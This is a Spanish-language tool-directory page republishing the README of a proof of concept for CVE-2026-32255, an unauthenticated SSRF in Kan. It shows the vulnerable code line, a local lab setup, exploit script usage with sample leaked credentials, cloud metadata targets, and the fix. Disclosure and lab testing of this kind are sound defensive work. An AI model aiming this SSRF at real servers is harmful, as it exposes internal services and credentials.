Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-cve-2026-32255 — Este repositorio contiene una prueba de concepto (POC) para CVE-2026-32255, una vulnerabilidad de Server-Side Request Forgery (SSRF) de alta gravedad en Kan, una herramienta de gestión de proyectos de código abierto. | Kitploit
Herramientas/GitHubGitHub/koadt/poc-cve-2026-32255
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubkoadt/poc-cve-2026-32255

poc-cve-2026-32255

Este repositorio contiene una prueba de concepto (POC) para CVE-2026-32255, una vulnerabilidad de Server-Side Request Forgery (SSRF) de alta gravedad en Kan, una herramienta de gestión de proyectos de código abierto.

Ver Repositorio
2hace 5 mesesAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Kan SSRF mediante Descarga de Adjuntos (CVE-2026-32255) - Prueba de Concepto

Este repositorio contiene una prueba de concepto (POC) para CVE-2026-32255, una vulnerabilidad de Server-Side Request Forgery (SSRF) de alta severidad en Kan, una herramienta de gestión de proyectos de código abierto.

El endpoint vulnerable permite a atacantes no autenticados realizar solicitudes HTTP arbitrarias desde el servidor y leer la respuesta completa, lo que permite el acceso a servicios internos y endpoints de metadatos en la nube.

Tabla de Contenidos

  1. Detalles de la Vulnerabilidad
  2. Ejecutar la POC
  3. Usar el Script de Explotación
  4. Cómo Corregir la Vulnerabilidad
  5. Descargo de Responsabilidad

Detalles de la Vulnerabilidad

Información del CVE

  • ID del CVE: CVE-2026-32255
  • Versiones Afectadas: Kan <= 0.5.4
  • Versión Corregida: 0.5.5
  • : 8.6 (Alta)
Puntuación CVSS
  • Vector CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-918 (Server-Side Request Forgery)
  • Descripción

    El archivo apps/web/src/pages/api/download/attatchment.ts expone un endpoint GET /api/download/attatchment destinado a actuar como proxy para descargas de adjuntos desde el almacenamiento S3. El endpoint acepta un parámetro de consulta url controlado por el usuario y lo pasa directamente a fetch() en el lado del servidor sin ninguna validación ni autenticación:

    root@kitploit:~
    const upstream = await fetch(url); // no validation on `url`
    

    Un atacante puede proporcionar cualquier URL, lo que hace que el servidor realice una solicitud HTTP a ese destino y devuelva el cuerpo completo de la respuesta al cliente. Esto es un SSRF de lectura completa (no ciego), lo que significa que el atacante puede leer todo el contenido de la respuesta.

    Impacto

    • Acceso a servicios internos no expuestos a internet
    • Lectura de endpoints de metadatos en la nube (por ejemplo, http://169.254.169.254/ en AWS/GCP)
    • Escaneo de puertos en redes internas
    • Exfiltración de datos sensibles de APIs internas

    Referencias

    • NVD - CVE-2026-32255
    • Aviso de Seguridad de GitHub - GHSA-qrx8-9hc6-jvqg
    • Commit de Corrección

    Ejecutar la POC

    Requisitos Previos

    • Docker y Docker Compose
    • Bash
    • curl

    Paso 1: Ejecutar una Instancia Vulnerable de Kan

    Clona y ejecuta Kan v0.5.4 (la última versión vulnerable):

    root@kitploit:~
    git clone --branch v0.5.4 https://github.com/kanbn/kan.git
    cd kan
    

    Configura las variables de entorno requeridas:

    root@kitploit:~
    cat > .env <<'EOF'
    NEXT_PUBLIC_BASE_URL=http://localhost:3000
    BETTER_AUTH_SECRET=poc-secret-not-for-production-use
    POSTGRES_URL=postgresql://kan:kan@localhost:5432/kan_db
    POSTGRES_PASSWORD=kan
    REDIS_URL=redis://localhost:6379
    NEXT_PUBLIC_STORAGE_URL=http://localhost:9000
    EOF
    

    Nota: Si obtienes un error sobre dokploy-network, elimina las referencias a dokploy-network de docker-compose.yml (líneas 9, 130-131) y ejecuta docker compose up -d nuevamente. Esta red no es necesaria localmente.

    Inicia los contenedores:

    root@kitploit:~
    docker compose up -d
    

    La aplicación debería estar disponible en http://localhost:3000.

    Paso 2: Iniciar el Servicio Interno Simulado

    En una terminal separada, inicia el servicio interno simulado incluido que simula una API interna sensible:

    root@kitploit:~
    python3 internal-service.py
    

    Esto inicia un servidor en el puerto 8888 que devuelve credenciales falsas, simulando un servicio que solo debería ser accesible desde la red interna. En un escenario del mundo real, este servicio estaría aislado detrás de un firewall e inaccesible desde el exterior. El SSRF permite al atacante alcanzarlo a través del servidor.

    Paso 3: Ejecutar la Explotación

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh http://localhost:3000
    

    Usar el Script de Explotación

    Uso

    root@kitploit:~
    ./exploit.sh <url-objetivo> [url-interna]
    
    • <url-objetivo>: URL base de la instancia de Kan (por ejemplo, http://localhost:3000)
    • [url-interna]: URL interna a obtener mediante SSRF (opcional, se detecta automáticamente desde la puerta de enlace del puente de Docker)

    Ejemplo

    root@kitploit:~
    ./exploit.sh http://localhost:3000
    
    root@kitploit:~
    === CVE-2026-32255 - Kan SSRF mediante Descarga de Adjuntos ===
    Objetivo: http://localhost:3000
    URL interna: http://172.17.0.1:8888
    
    [*] Comprobando si el endpoint es accesible...
    [+] El endpoint es accesible (HTTP 400)
    
    [*] Intentando SSRF a http://172.17.0.1:8888 ...
    [+] VULNERABLE - El servidor obtuvo el recurso interno
    
    Contenido filtrado:
    ------------------------------------------------------------
    {
      "service": "internal-config-api",
      "credentials": {
        "db_host": "10.0.0.5",
        "db_user": "admin",
        "db_password": "s3cret_passw0rd!",
        "api_key": "sk-internal-4f8a2b1c9d3e7f6a5b0c8d2e1f4a7b3c"
      }
    }
    ------------------------------------------------------------
    

    Cómo Corregir la Vulnerabilidad

    Actualizar Kan (Recomendado)

    Actualiza a Kan v0.5.5 o posterior, que valida el parámetro url contra el nombre de host del endpoint S3 configurado antes de realizar el proxy de la solicitud.

    Solución Alternativa: Bloquear en el Proxy Inverso

    Si no puedes actualizar de inmediato, bloquea el acceso externo al endpoint vulnerable a nivel de tu proxy inverso.


    Descargo de Responsabilidad

    Esta prueba de concepto se proporciona solo con fines educativos y para pruebas de seguridad autorizadas. Utiliza esta herramienta únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas.

    El autor no es responsable del mal uso de la información o las herramientas proporcionadas en este repositorio. El acceso no autorizado a sistemas informáticos es ilegal.


    Descubierto por: kOaDT ([email protected])

    Descargar herramienta